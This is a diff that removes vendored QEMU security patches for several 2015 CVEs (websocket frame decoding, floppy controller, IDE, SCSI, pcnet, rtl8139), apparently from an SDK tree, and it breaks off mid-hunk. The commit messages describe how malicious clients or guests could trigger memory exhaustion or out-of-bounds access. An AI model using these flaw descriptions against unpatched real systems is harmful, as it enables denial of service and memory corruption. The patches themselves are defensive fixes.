MISC metadata.xml 3748 SHA256 ddc383b4236e3fb213427aa985f9d42b0b701675b6085fc3f8f6eecac4fd317f SHA512 ace8bf0729123df50dcb01fff5012302ffccf2b43876684c5c739fde865586ec1586d444691a6024e37fbfaba014f211fad01bc6d301ea09aa78ecf3b8c96684 WHIRLPOOL 4c54da70dc2319a49fca73e81ac796464d57b5c78cdb18d7b0f84c58bb3942f805f649bf9d142293dee0c1706e087cc601c10887133637df2678bec91b8d25dc MISC metadata.xml 3925 SHA256 d1c219b7da0cbf77919cd1e055acbb3f6788a574fd802c98a43c89a411697b36 SHA512 3ff45d1c8ede12b4eedc7d01f39777b76a1cbd0ba9364299dec99d4b4a05cade5784d6f6e50197d5b5ae1f1b8e831c49da195eb53263c49b7d16aec8ee28b6e6 WHIRLPOOL bc25783fac0f3f13318834cc535404af9af20de16c7aeec222e59dc2ed7740ac5e767b329a5bcd6356d0cbae2428e278515f1446aa8ecb87a873bf4dbe04bf41

241
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.2.1-CVE-2015-1779-1.patch vendored
View File

@ -1,241 +0,0 @@
From a2bebfd6e09d285aa793cae3fb0fc3a39a9fee6e Mon Sep 17 00:00:00 2001
From: "Daniel P. Berrange" <berrange@redhat.com>
Date: Mon, 23 Mar 2015 22:58:21 +0000
Subject: [PATCH] CVE-2015-1779: incrementally decode websocket frames
The logic for decoding websocket frames wants to fully
decode the frame header and payload, before allowing the
VNC server to see any of the payload data. There is no
size limit on websocket payloads, so this allows a
malicious network client to consume 2^64 bytes in memory
in QEMU. It can trigger this denial of service before
the VNC server even performs any authentication.
The fix is to decode the header, and then incrementally
decode the payload data as it is needed. With this fix
the websocket decoder will allow at most 4k of data to
be buffered before decoding and processing payload.
Signed-off-by: Daniel P. Berrange <berrange@redhat.com>
[ kraxel: fix frequent spurious disconnects, suggested by Peter Maydell ]
@@ -361,7 +361,7 @@ int vncws_decode_frame_payload(Buffer *input,
- *payload_size = input->offset;
+ *payload_size = *payload_remain;
[ kraxel: fix 32bit build ]
@@ -306,7 +306,7 @@ struct VncState
- uint64_t ws_payload_remain;
+ size_t ws_payload_remain;
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
ui/vnc-ws.c | 105 ++++++++++++++++++++++++++++++++++++++++--------------------
ui/vnc-ws.h | 9 ++++--
ui/vnc.h | 2 ++
3 files changed, 80 insertions(+), 36 deletions(-)
diff --git a/ui/vnc-ws.c b/ui/vnc-ws.c
index 85dbb7e..0b7de4e 100644
--- a/ui/vnc-ws.c
+++ b/ui/vnc-ws.c
@@ -107,7 +107,7 @@ long vnc_client_read_ws(VncState *vs)
{
int ret, err;
uint8_t *payload;
- size_t payload_size, frame_size;
+ size_t payload_size, header_size;
VNC_DEBUG("Read websocket %p size %zd offset %zd\n", vs->ws_input.buffer,
vs->ws_input.capacity, vs->ws_input.offset);
buffer_reserve(&vs->ws_input, 4096);
@@ -117,18 +117,39 @@ long vnc_client_read_ws(VncState *vs)
}
vs->ws_input.offset += ret;
- /* make sure that nothing is left in the ws_input buffer */
+ ret = 0;
+ /* consume as much of ws_input buffer as possible */
do {
- err = vncws_decode_frame(&vs->ws_input, &payload,
- &payload_size, &frame_size);
- if (err <= 0) {
- return err;
+ if (vs->ws_payload_remain == 0) {
+ err = vncws_decode_frame_header(&vs->ws_input,
+ &header_size,
+ &vs->ws_payload_remain,
+ &vs->ws_payload_mask);
+ if (err <= 0) {
+ return err;
+ }
+
+ buffer_advance(&vs->ws_input, header_size);
}
+ if (vs->ws_payload_remain != 0) {
+ err = vncws_decode_frame_payload(&vs->ws_input,
+ &vs->ws_payload_remain,
+ &vs->ws_payload_mask,
+ &payload,
+ &payload_size);
+ if (err < 0) {
+ return err;
+ }
+ if (err == 0) {
+ return ret;
+ }
+ ret += err;
- buffer_reserve(&vs->input, payload_size);
- buffer_append(&vs->input, payload, payload_size);
+ buffer_reserve(&vs->input, payload_size);
+ buffer_append(&vs->input, payload, payload_size);
- buffer_advance(&vs->ws_input, frame_size);
+ buffer_advance(&vs->ws_input, payload_size);
+ }
} while (vs->ws_input.offset > 0);
return ret;
@@ -265,15 +286,14 @@ void vncws_encode_frame(Buffer *output, const void *payload,
buffer_append(output, payload, payload_size);
}
-int vncws_decode_frame(Buffer *input, uint8_t **payload,
- size_t *payload_size, size_t *frame_size)
+int vncws_decode_frame_header(Buffer *input,
+ size_t *header_size,
+ size_t *payload_remain,
+ WsMask *payload_mask)
{
unsigned char opcode = 0, fin = 0, has_mask = 0;
- size_t header_size = 0;
- uint32_t *payload32;
+ size_t payload_len;
WsHeader *header = (WsHeader *)input->buffer;
- WsMask mask;
- int i;
if (input->offset < WS_HEAD_MIN_LEN + 4) {
/* header not complete */
@@ -283,7 +303,7 @@ int vncws_decode_frame(Buffer *input, uint8_t **payload,
fin = (header->b0 & 0x80) >> 7;
opcode = header->b0 & 0x0f;
has_mask = (header->b1 & 0x80) >> 7;
- *payload_size = header->b1 & 0x7f;
+ payload_len = header->b1 & 0x7f;
if (opcode == WS_OPCODE_CLOSE) {
/* disconnect */
@@ -300,40 +320,57 @@ int vncws_decode_frame(Buffer *input, uint8_t **payload,
return -2;
}
- if (*payload_size < 126) {
- header_size = 6;
- mask = header->u.m;
- } else if (*payload_size == 126 && input->offset >= 8) {
- *payload_size = be16_to_cpu(header->u.s16.l16);
- header_size = 8;
- mask = header->u.s16.m16;
- } else if (*payload_size == 127 && input->offset >= 14) {
- *payload_size = be64_to_cpu(header->u.s64.l64);
- header_size = 14;
- mask = header->u.s64.m64;
+ if (payload_len < 126) {
+ *payload_remain = payload_len;
+ *header_size = 6;
+ *payload_mask = header->u.m;
+ } else if (payload_len == 126 && input->offset >= 8) {
+ *payload_remain = be16_to_cpu(header->u.s16.l16);
+ *header_size = 8;
+ *payload_mask = header->u.s16.m16;
+ } else if (payload_len == 127 && input->offset >= 14) {
+ *payload_remain = be64_to_cpu(header->u.s64.l64);
+ *header_size = 14;
+ *payload_mask = header->u.s64.m64;
} else {
/* header not complete */
return 0;
}
- *frame_size = header_size + *payload_size;
+ return 1;
+}
+
+int vncws_decode_frame_payload(Buffer *input,
+ size_t *payload_remain, WsMask *payload_mask,
+ uint8_t **payload, size_t *payload_size)
+{
+ size_t i;
+ uint32_t *payload32;
- if (input->offset < *frame_size) {
- /* frame not complete */
+ *payload = input->buffer;
+ /* If we aren't at the end of the payload, then drop
+ * off the last bytes, so we're always multiple of 4
+ * for purpose of unmasking, except at end of payload
+ */
+ if (input->offset < *payload_remain) {
+ *payload_size = input->offset - (input->offset % 4);
+ } else {
+ *payload_size = *payload_remain;
+ }
+ if (*payload_size == 0) {
return 0;
}
-
- *payload = input->buffer + header_size;
+ *payload_remain -= *payload_size;
/* unmask frame */
/* process 1 frame (32 bit op) */
payload32 = (uint32_t *)(*payload);
for (i = 0; i < *payload_size / 4; i++) {
- payload32[i] ^= mask.u;
+ payload32[i] ^= payload_mask->u;
}
/* process the remaining bytes (if any) */
for (i *= 4; i < *payload_size; i++) {
- (*payload)[i] ^= mask.c[i % 4];
+ (*payload)[i] ^= payload_mask->c[i % 4];
}
return 1;
diff --git a/ui/vnc-ws.h b/ui/vnc-ws.h
index ef229b7..14d4230 100644
--- a/ui/vnc-ws.h
+++ b/ui/vnc-ws.h
@@ -83,7 +83,12 @@ long vnc_client_read_ws(VncState *vs);
void vncws_process_handshake(VncState *vs, uint8_t *line, size_t size);
void vncws_encode_frame(Buffer *output, const void *payload,
const size_t payload_size);
-int vncws_decode_frame(Buffer *input, uint8_t **payload,
- size_t *payload_size, size_t *frame_size);
+int vncws_decode_frame_header(Buffer *input,
+ size_t *header_size,
+ size_t *payload_remain,
+ WsMask *payload_mask);
+int vncws_decode_frame_payload(Buffer *input,
+ size_t *payload_remain, WsMask *payload_mask,
+ uint8_t **payload, size_t *payload_size);
#endif /* __QEMU_UI_VNC_WS_H */
diff --git a/ui/vnc.h b/ui/vnc.h
index e19ac39..3f7c6a9 100644
--- a/ui/vnc.h
+++ b/ui/vnc.h
@@ -306,6 +306,8 @@ struct VncState
#ifdef CONFIG_VNC_WS
Buffer ws_input;
Buffer ws_output;
+ size_t ws_payload_remain;
+ WsMask ws_payload_mask;
#endif
/* current output mode information */
VncWritePixels *write_pixels;
--
2.3.5

58
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.2.1-CVE-2015-1779-2.patch vendored
View File

@ -1,58 +0,0 @@
From 2cdb5e142fb93e875fa53c52864ef5eb8d5d8b41 Mon Sep 17 00:00:00 2001
From: "Daniel P. Berrange" <berrange@redhat.com>
Date: Mon, 23 Mar 2015 22:58:22 +0000
Subject: [PATCH] CVE-2015-1779: limit size of HTTP headers from websockets
clients
The VNC server websockets decoder will read and buffer data from
websockets clients until it sees the end of the HTTP headers,
as indicated by \r\n\r\n. In theory this allows a malicious to
trick QEMU into consuming an arbitrary amount of RAM. In practice,
because QEMU runs g_strstr_len() across the buffered header data,
it will spend increasingly long burning CPU time searching for
the substring match and less & less time reading data. So while
this does cause arbitrary memory growth, the bigger problem is
that QEMU will be burning 100% of available CPU time.
A novnc websockets client typically sends headers of around
512 bytes in length. As such it is reasonable to place a 4096
byte limit on the amount of data buffered while searching for
the end of HTTP headers.
Signed-off-by: Daniel P. Berrange <berrange@redhat.com>
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
ui/vnc-ws.c | 10 ++++++++--
1 file changed, 8 insertions(+), 2 deletions(-)
diff --git a/ui/vnc-ws.c b/ui/vnc-ws.c
index 0b7de4e..62eb97f 100644
--- a/ui/vnc-ws.c
+++ b/ui/vnc-ws.c
@@ -81,8 +81,11 @@ void vncws_handshake_read(void *opaque)
VncState *vs = opaque;
uint8_t *handshake_end;
long ret;
- buffer_reserve(&vs->ws_input, 4096);
- ret = vnc_client_read_buf(vs, buffer_end(&vs->ws_input), 4096);
+ /* Typical HTTP headers from novnc are 512 bytes, so limiting
+ * total header size to 4096 is easily enough. */
+ size_t want = 4096 - vs->ws_input.offset;
+ buffer_reserve(&vs->ws_input, want);
+ ret = vnc_client_read_buf(vs, buffer_end(&vs->ws_input), want);
if (!ret) {
if (vs->csock == -1) {
@@ -99,6 +102,9 @@ void vncws_handshake_read(void *opaque)
vncws_process_handshake(vs, vs->ws_input.buffer, vs->ws_input.offset);
buffer_advance(&vs->ws_input, handshake_end - vs->ws_input.buffer +
strlen(WS_HANDSHAKE_END));
+ } else if (vs->ws_input.offset >= 4096) {
+ VNC_DEBUG("End of headers not found in first 4096 bytes\n");
+ vnc_client_error(vs);
}
}
--
2.3.5

51
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.3.0-CVE-2015-3209.patch vendored
View File

@ -1,51 +0,0 @@
https://bugs.gentoo.org/551752
From 9f7c594c006289ad41169b854d70f5da6e400a2a Mon Sep 17 00:00:00 2001
From: Petr Matousek <pmatouse@redhat.com>
Date: Sun, 24 May 2015 10:53:44 +0200
Subject: [PATCH] pcnet: force the buffer access to be in bounds during tx
4096 is the maximum length per TMD and it is also currently the size of
the relay buffer pcnet driver uses for sending the packet data to QEMU
for further processing. With packet spanning multiple TMDs it can
happen that the overall packet size will be bigger than sizeof(buffer),
which results in memory corruption.
Fix this by only allowing to queue maximum sizeof(buffer) bytes.
This is CVE-2015-3209.
[Fixed 3-space indentation to QEMU's 4-space coding standard.
--Stefan]
Signed-off-by: Petr Matousek <pmatouse@redhat.com>
Reported-by: Matt Tait <matttait@google.com>
Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
Reviewed-by: Stefan Hajnoczi <stefanha@redhat.com>
Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
---
hw/net/pcnet.c | 8 ++++++++
1 file changed, 8 insertions(+)
diff --git a/hw/net/pcnet.c b/hw/net/pcnet.c
index bdfd38f..68b9981 100644
--- a/hw/net/pcnet.c
+++ b/hw/net/pcnet.c
@@ -1241,6 +1241,14 @@ static void pcnet_transmit(PCNetState *s)
}
bcnt = 4096 - GET_FIELD(tmd.length, TMDL, BCNT);
+
+ /* if multi-tmd packet outsizes s->buffer then skip it silently.
+ Note: this is not what real hw does */
+ if (s->xmit_pos + bcnt > sizeof(s->buffer)) {
+ s->xmit_pos = -1;
+ goto txdone;
+ }
+
s->phys_mem_read(s->dma_opaque, PHYSADDR(s, tmd.tbadr),
s->buffer + s->xmit_pos, bcnt, CSR_BSWP(s));
s->xmit_pos += bcnt;
--
2.2.0.rc0.207.ga3a616c

41
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.3.0-CVE-2015-3214.patch vendored
View File

@ -1,41 +0,0 @@
From: Petr Matousek <pmatouse@redhat.com>
Date: Wed, 17 Jun 2015 10:46:11 +0000 (+0200)
Subject: i8254: fix out-of-bounds memory access in pit_ioport_read()
X-Git-Tag: v2.4.0-rc0~43^2~9
X-Git-Url: http://git.qemu.org/?p=qemu.git;a=commitdiff_plain;h=d4862a87e31a51de9eb260f25c9e99a75efe3235;hp=9dacf32d2cbd66cbcce7944ebdfd6b2df20e33b8
i8254: fix out-of-bounds memory access in pit_ioport_read()
Due converting PIO to the new memory read/write api we no longer provide
separate I/O region lenghts for read and write operations. As a result,
reading from PIT Mode/Command register will end with accessing
pit->channels with invalid index.
Fix this by ignoring read from the Mode/Command register.
This is CVE-2015-3214.
Reported-by: Matt Tait <matttait@google.com>
Fixes: 0505bcdec8228d8de39ab1a02644e71999e7c052
Cc: qemu-stable@nongnu.org
Signed-off-by: Petr Matousek <pmatouse@redhat.com>
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
---
diff --git a/hw/timer/i8254.c b/hw/timer/i8254.c
index 3450c98..9b65a33 100644
--- a/hw/timer/i8254.c
+++ b/hw/timer/i8254.c
@@ -196,6 +196,12 @@ static uint64_t pit_ioport_read(void *opaque, hwaddr addr,
PITChannelState *s;
addr &= 3;
+
+ if (addr == 3) {
+ /* Mode/Command register is write only, read is ignored */
+ return 0;
+ }
+
s = &pit->channels[addr];
if (s->status_latched) {
s->status_latched = 0;

86
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.3.0-CVE-2015-3456.patch vendored
View File

@ -1,86 +0,0 @@
https://bugs.gentoo.org/549404
From e907746266721f305d67bc0718795fedee2e824c Mon Sep 17 00:00:00 2001
From: Petr Matousek <pmatouse@redhat.com>
Date: Wed, 6 May 2015 09:48:59 +0200
Subject: [PATCH] fdc: force the fifo access to be in bounds of the allocated buffer
During processing of certain commands such as FD_CMD_READ_ID and
FD_CMD_DRIVE_SPECIFICATION_COMMAND the fifo memory access could
get out of bounds leading to memory corruption with values coming
from the guest.
Fix this by making sure that the index is always bounded by the
allocated memory.
This is CVE-2015-3456.
Signed-off-by: Petr Matousek <pmatouse@redhat.com>
Reviewed-by: John Snow <jsnow@redhat.com>
Signed-off-by: John Snow <jsnow@redhat.com>
---
hw/block/fdc.c | 17 +++++++++++------
1 files changed, 11 insertions(+), 6 deletions(-)
diff --git a/hw/block/fdc.c b/hw/block/fdc.c
index f72a392..d8a8edd 100644
--- a/hw/block/fdc.c
+++ b/hw/block/fdc.c
@@ -1497,7 +1497,7 @@ static uint32_t fdctrl_read_data(FDCtrl *fdctrl)
{
FDrive *cur_drv;
uint32_t retval = 0;
- int pos;
+ uint32_t pos;
cur_drv = get_cur_drv(fdctrl);
fdctrl->dsr &= ~FD_DSR_PWRDOWN;
@@ -1506,8 +1506,8 @@ static uint32_t fdctrl_read_data(FDCtrl *fdctrl)
return 0;
}
pos = fdctrl->data_pos;
+ pos %= FD_SECTOR_LEN;
if (fdctrl->msr & FD_MSR_NONDMA) {
- pos %= FD_SECTOR_LEN;
if (pos == 0) {
if (fdctrl->data_pos != 0)
if (!fdctrl_seek_to_next_sect(fdctrl, cur_drv)) {
@@ -1852,10 +1852,13 @@ static void fdctrl_handle_option(FDCtrl *fdctrl, int direction)
static void fdctrl_handle_drive_specification_command(FDCtrl *fdctrl, int direction)
{
FDrive *cur_drv = get_cur_drv(fdctrl);
+ uint32_t pos;
- if (fdctrl->fifo[fdctrl->data_pos - 1] & 0x80) {
+ pos = fdctrl->data_pos - 1;
+ pos %= FD_SECTOR_LEN;
+ if (fdctrl->fifo[pos] & 0x80) {
/* Command parameters done */
- if (fdctrl->fifo[fdctrl->data_pos - 1] & 0x40) {
+ if (fdctrl->fifo[pos] & 0x40) {
fdctrl->fifo[0] = fdctrl->fifo[1];
fdctrl->fifo[2] = 0;
fdctrl->fifo[3] = 0;
@@ -1955,7 +1958,7 @@ static uint8_t command_to_handler[256];
static void fdctrl_write_data(FDCtrl *fdctrl, uint32_t value)
{
FDrive *cur_drv;
- int pos;
+ uint32_t pos;
/* Reset mode */
if (!(fdctrl->dor & FD_DOR_nRESET)) {
@@ -2004,7 +2007,9 @@ static void fdctrl_write_data(FDCtrl *fdctrl, uint32_t value)
}
FLOPPY_DPRINTF("%s: %02x\n", __func__, value);
- fdctrl->fifo[fdctrl->data_pos++] = value;
+ pos = fdctrl->data_pos++;
+ pos %= FD_SECTOR_LEN;
+ fdctrl->fifo[pos] = value;
if (fdctrl->data_pos == fdctrl->data_len) {
/* We now have all parameters
* and will be able to treat the command
--
1.7.0.4

75
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.3.0-CVE-2015-5154-1.patch vendored
View File

@ -1,75 +0,0 @@
From d2ff85854512574e7209f295e87b0835d5b032c6 Mon Sep 17 00:00:00 2001
From: Kevin Wolf <kwolf@redhat.com>
Date: Sun, 26 Jul 2015 23:42:53 -0400
Subject: [PATCH] ide: Check array bounds before writing to io_buffer
(CVE-2015-5154)
If the end_transfer_func of a command is called because enough data has
been read or written for the current PIO transfer, and it fails to
correctly call the command completion functions, the DRQ bit in the
status register and s->end_transfer_func may remain set. This allows the
guest to access further bytes in s->io_buffer beyond s->data_end, and
eventually overflowing the io_buffer.
One case where this currently happens is emulation of the ATAPI command
START STOP UNIT.
This patch fixes the problem by adding explicit array bounds checks
before accessing the buffer instead of relying on end_transfer_func to
function correctly.
Cc: qemu-stable@nongnu.org
Signed-off-by: Kevin Wolf <kwolf@redhat.com>
Reviewed-by: John Snow <jsnow@redhat.com>
---
hw/ide/core.c | 16 ++++++++++++++++
1 file changed, 16 insertions(+)
diff --git a/hw/ide/core.c b/hw/ide/core.c
index 122e955..44fcc23 100644
--- a/hw/ide/core.c
+++ b/hw/ide/core.c
@@ -2021,6 +2021,10 @@ void ide_data_writew(void *opaque, uint32_t addr, uint32_t val)
}
p = s->data_ptr;
+ if (p + 2 > s->data_end) {
+ return;
+ }
+
*(uint16_t *)p = le16_to_cpu(val);
p += 2;
s->data_ptr = p;
@@ -2042,6 +2046,10 @@ uint32_t ide_data_readw(void *opaque, uint32_t addr)
}
p = s->data_ptr;
+ if (p + 2 > s->data_end) {
+ return 0;
+ }
+
ret = cpu_to_le16(*(uint16_t *)p);
p += 2;
s->data_ptr = p;
@@ -2063,6 +2071,10 @@ void ide_data_writel(void *opaque, uint32_t addr, uint32_t val)
}
p = s->data_ptr;
+ if (p + 4 > s->data_end) {
+ return;
+ }
+
*(uint32_t *)p = le32_to_cpu(val);
p += 4;
s->data_ptr = p;
@@ -2084,6 +2096,10 @@ uint32_t ide_data_readl(void *opaque, uint32_t addr)
}
p = s->data_ptr;
+ if (p + 4 > s->data_end) {
+ return 0;
+ }
+
ret = cpu_to_le32(*(uint32_t *)p);
p += 4;
s->data_ptr = p;

26
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.3.0-CVE-2015-5154-2.patch vendored
View File

@ -1,26 +0,0 @@
From 03441c3a4a42beb25460dd11592539030337d0f8 Mon Sep 17 00:00:00 2001
From: Kevin Wolf <kwolf@redhat.com>
Date: Sun, 26 Jul 2015 23:42:53 -0400
Subject: [PATCH] ide/atapi: Fix START STOP UNIT command completion
The command must be completed on all code paths. START STOP UNIT with
pwrcnd set should succeed without doing anything.
Signed-off-by: Kevin Wolf <kwolf@redhat.com>
Reviewed-by: John Snow <jsnow@redhat.com>
---
hw/ide/atapi.c | 1 +
1 file changed, 1 insertion(+)
diff --git a/hw/ide/atapi.c b/hw/ide/atapi.c
index 950e311..79dd167 100644
--- a/hw/ide/atapi.c
+++ b/hw/ide/atapi.c
@@ -983,6 +983,7 @@ static void cmd_start_stop_unit(IDEState *s, uint8_t* buf)
if (pwrcnd) {
/* eject/load only happens for power condition == 0 */
+ ide_atapi_cmd_ok(s);
return;
}

69
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.3.0-CVE-2015-5154-3.patch vendored
View File

@ -1,69 +0,0 @@
From cb72cba83021fa42719e73a5249c12096a4d1cfc Mon Sep 17 00:00:00 2001
From: Kevin Wolf <kwolf@redhat.com>
Date: Sun, 26 Jul 2015 23:42:53 -0400
Subject: [PATCH] ide: Clear DRQ after handling all expected accesses
This is additional hardening against an end_transfer_func that fails to
clear the DRQ status bit. The bit must be unset as soon as the PIO
transfer has completed, so it's better to do this in a central place
instead of duplicating the code in all commands (and forgetting it in
some).
Signed-off-by: Kevin Wolf <kwolf@redhat.com>
Reviewed-by: John Snow <jsnow@redhat.com>
---
hw/ide/core.c | 16 ++++++++++++----
1 file changed, 12 insertions(+), 4 deletions(-)
diff --git a/hw/ide/core.c b/hw/ide/core.c
index 44fcc23..50449ca 100644
--- a/hw/ide/core.c
+++ b/hw/ide/core.c
@@ -2028,8 +2028,10 @@ void ide_data_writew(void *opaque, uint32_t addr, uint32_t val)
*(uint16_t *)p = le16_to_cpu(val);
p += 2;
s->data_ptr = p;
- if (p >= s->data_end)
+ if (p >= s->data_end) {
+ s->status &= ~DRQ_STAT;
s->end_transfer_func(s);
+ }
}
uint32_t ide_data_readw(void *opaque, uint32_t addr)
@@ -2053,8 +2055,10 @@ uint32_t ide_data_readw(void *opaque, uint32_t addr)
ret = cpu_to_le16(*(uint16_t *)p);
p += 2;
s->data_ptr = p;
- if (p >= s->data_end)
+ if (p >= s->data_end) {
+ s->status &= ~DRQ_STAT;
s->end_transfer_func(s);
+ }
return ret;
}
@@ -2078,8 +2082,10 @@ void ide_data_writel(void *opaque, uint32_t addr, uint32_t val)
*(uint32_t *)p = le32_to_cpu(val);
p += 4;
s->data_ptr = p;
- if (p >= s->data_end)
+ if (p >= s->data_end) {
+ s->status &= ~DRQ_STAT;
s->end_transfer_func(s);
+ }
}
uint32_t ide_data_readl(void *opaque, uint32_t addr)
@@ -2103,8 +2109,10 @@ uint32_t ide_data_readl(void *opaque, uint32_t addr)
ret = cpu_to_le32(*(uint32_t *)p);
p += 4;
s->data_ptr = p;
- if (p >= s->data_end)
+ if (p >= s->data_end) {
+ s->status &= ~DRQ_STAT;
s->end_transfer_func(s);
+ }
return ret;
}

40
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.3.0-CVE-2015-5158.patch vendored
View File

@ -1,40 +0,0 @@
commit c170aad8b057223b1139d72e5ce7acceafab4fa9
Author: Paolo Bonzini <pbonzini@redhat.com>
Date: Tue Jul 21 08:59:39 2015 +0200
scsi: fix buffer overflow in scsi_req_parse_cdb (CVE-2015-5158)
This is a guest-triggerable buffer overflow present in QEMU 2.2.0
and newer. scsi_cdb_length returns -1 as an error value, but the
caller does not check it.
Luckily, the massive overflow means that QEMU will just SIGSEGV,
making the impact much smaller.
Reported-by: Zhu Donghai (朱东海) <donghai.zdh@alibaba-inc.com>
Fixes: 1894df02811f6b79ea3ffbf1084599d96f316173
Reviewed-by: Fam Zheng <famz@redhat.com>
Cc: qemu-stable@nongnu.org
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
diff --git a/hw/scsi/scsi-bus.c b/hw/scsi/scsi-bus.c
index f50b2f0..f0ae462 100644
--- a/hw/scsi/scsi-bus.c
+++ b/hw/scsi/scsi-bus.c
@@ -1239,10 +1239,15 @@ int scsi_cdb_length(uint8_t *buf) {
int scsi_req_parse_cdb(SCSIDevice *dev, SCSICommand *cmd, uint8_t *buf)
{
int rc;
+ int len;
cmd->lba = -1;
- cmd->len = scsi_cdb_length(buf);
+ len = scsi_cdb_length(buf);
+ if (len < 0) {
+ return -1;
+ }
+ cmd->len = len;
switch (dev->type) {
case TYPE_TAPE:
rc = scsi_req_stream_xfer(cmd, dev, buf);

82
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.3.0-CVE-2015-5165-1.patch vendored
View File

@ -1,82 +0,0 @@
From 5e0c290415b9d57077a86e70c8e6a058868334d3 Mon Sep 17 00:00:00 2001
From: Stefan Hajnoczi <stefanha@redhat.com>
Date: Wed, 15 Jul 2015 18:16:58 +0100
Subject: [PATCH 1/7] rtl8139: avoid nested ifs in IP header parsing
Transmit offload needs to parse packet headers. If header fields have
unexpected values the offload processing is skipped.
The code currently uses nested ifs because there is relatively little
input validation. The next patches will add missing input validation
and a goto label is more appropriate to avoid deep if statement nesting.
Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
---
hw/net/rtl8139.c | 41 ++++++++++++++++++++++-------------------
1 file changed, 22 insertions(+), 19 deletions(-)
diff --git a/hw/net/rtl8139.c b/hw/net/rtl8139.c
index 5f0197c..91ba33b 100644
--- a/hw/net/rtl8139.c
+++ b/hw/net/rtl8139.c
@@ -2174,28 +2174,30 @@ static int rtl8139_cplus_transmit_one(RTL8139State *s)
size_t eth_payload_len = 0;
int proto = be16_to_cpu(*(uint16_t *)(saved_buffer + 12));
- if (proto == ETH_P_IP)
+ if (proto != ETH_P_IP)
{
- DPRINTF("+++ C+ mode has IP packet\n");
-
- /* not aligned */
- eth_payload_data = saved_buffer + ETH_HLEN;
- eth_payload_len = saved_size - ETH_HLEN;
-
- ip = (ip_header*)eth_payload_data;
-
- if (IP_HEADER_VERSION(ip) != IP_HEADER_VERSION_4) {
- DPRINTF("+++ C+ mode packet has bad IP version %d "
- "expected %d\n", IP_HEADER_VERSION(ip),
- IP_HEADER_VERSION_4);
- ip = NULL;
- } else {
- hlen = IP_HEADER_LENGTH(ip);
- ip_protocol = ip->ip_p;
- ip_data_len = be16_to_cpu(ip->ip_len) - hlen;
- }
+ goto skip_offload;
}
+ DPRINTF("+++ C+ mode has IP packet\n");
+
+ /* not aligned */
+ eth_payload_data = saved_buffer + ETH_HLEN;
+ eth_payload_len = saved_size - ETH_HLEN;
+
+ ip = (ip_header*)eth_payload_data;
+
+ if (IP_HEADER_VERSION(ip) != IP_HEADER_VERSION_4) {
+ DPRINTF("+++ C+ mode packet has bad IP version %d "
+ "expected %d\n", IP_HEADER_VERSION(ip),
+ IP_HEADER_VERSION_4);
+ goto skip_offload;
+ }
+
+ hlen = IP_HEADER_LENGTH(ip);
+ ip_protocol = ip->ip_p;
+ ip_data_len = be16_to_cpu(ip->ip_len) - hlen;
+
if (ip)
{
if (txdw0 & CP_TX_IPCS)
@@ -2391,6 +2393,7 @@ static int rtl8139_cplus_transmit_one(RTL8139State *s)
}
}
+skip_offload:
/* update tally counter */
++s->tally_counters.TxOk;
--
2.1.4

373
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.3.0-CVE-2015-5165-2.patch vendored
View File

@ -1,373 +0,0 @@
From 2d7d80e8dc160904fa7276cc05da26c062a50066 Mon Sep 17 00:00:00 2001
From: Stefan Hajnoczi <stefanha@redhat.com>
Date: Wed, 15 Jul 2015 18:16:59 +0100
Subject: [PATCH 2/7] rtl8139: drop tautologous if (ip) {...} statement
The previous patch stopped using the ip pointer as an indicator that the
IP header is present. When we reach the if (ip) {...} statement we know
ip is always non-NULL.
Remove the if statement to reduce nesting.
Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
---
hw/net/rtl8139.c | 305 +++++++++++++++++++++++++++----------------------------
1 file changed, 151 insertions(+), 154 deletions(-)
diff --git a/hw/net/rtl8139.c b/hw/net/rtl8139.c
index 91ba33b..2f12d42 100644
--- a/hw/net/rtl8139.c
+++ b/hw/net/rtl8139.c
@@ -2198,198 +2198,195 @@ static int rtl8139_cplus_transmit_one(RTL8139State *s)
ip_protocol = ip->ip_p;
ip_data_len = be16_to_cpu(ip->ip_len) - hlen;
- if (ip)
+ if (txdw0 & CP_TX_IPCS)
{
- if (txdw0 & CP_TX_IPCS)
- {
- DPRINTF("+++ C+ mode need IP checksum\n");
+ DPRINTF("+++ C+ mode need IP checksum\n");
- if (hlen<sizeof(ip_header) || hlen>eth_payload_len) {/* min header length */
- /* bad packet header len */
- /* or packet too short */
- }
- else
- {
- ip->ip_sum = 0;
- ip->ip_sum = ip_checksum(ip, hlen);
- DPRINTF("+++ C+ mode IP header len=%d checksum=%04x\n",
- hlen, ip->ip_sum);
- }
+ if (hlen<sizeof(ip_header) || hlen>eth_payload_len) {/* min header length */
+ /* bad packet header len */
+ /* or packet too short */
}
-
- if ((txdw0 & CP_TX_LGSEN) && ip_protocol == IP_PROTO_TCP)
+ else
{
- int large_send_mss = (txdw0 >> 16) & CP_TC_LGSEN_MSS_MASK;
+ ip->ip_sum = 0;
+ ip->ip_sum = ip_checksum(ip, hlen);
+ DPRINTF("+++ C+ mode IP header len=%d checksum=%04x\n",
+ hlen, ip->ip_sum);
+ }
+ }
- DPRINTF("+++ C+ mode offloaded task TSO MTU=%d IP data %d "
- "frame data %d specified MSS=%d\n", ETH_MTU,
- ip_data_len, saved_size - ETH_HLEN, large_send_mss);
+ if ((txdw0 & CP_TX_LGSEN) && ip_protocol == IP_PROTO_TCP)
+ {
+ int large_send_mss = (txdw0 >> 16) & CP_TC_LGSEN_MSS_MASK;
- int tcp_send_offset = 0;
- int send_count = 0;
+ DPRINTF("+++ C+ mode offloaded task TSO MTU=%d IP data %d "
+ "frame data %d specified MSS=%d\n", ETH_MTU,
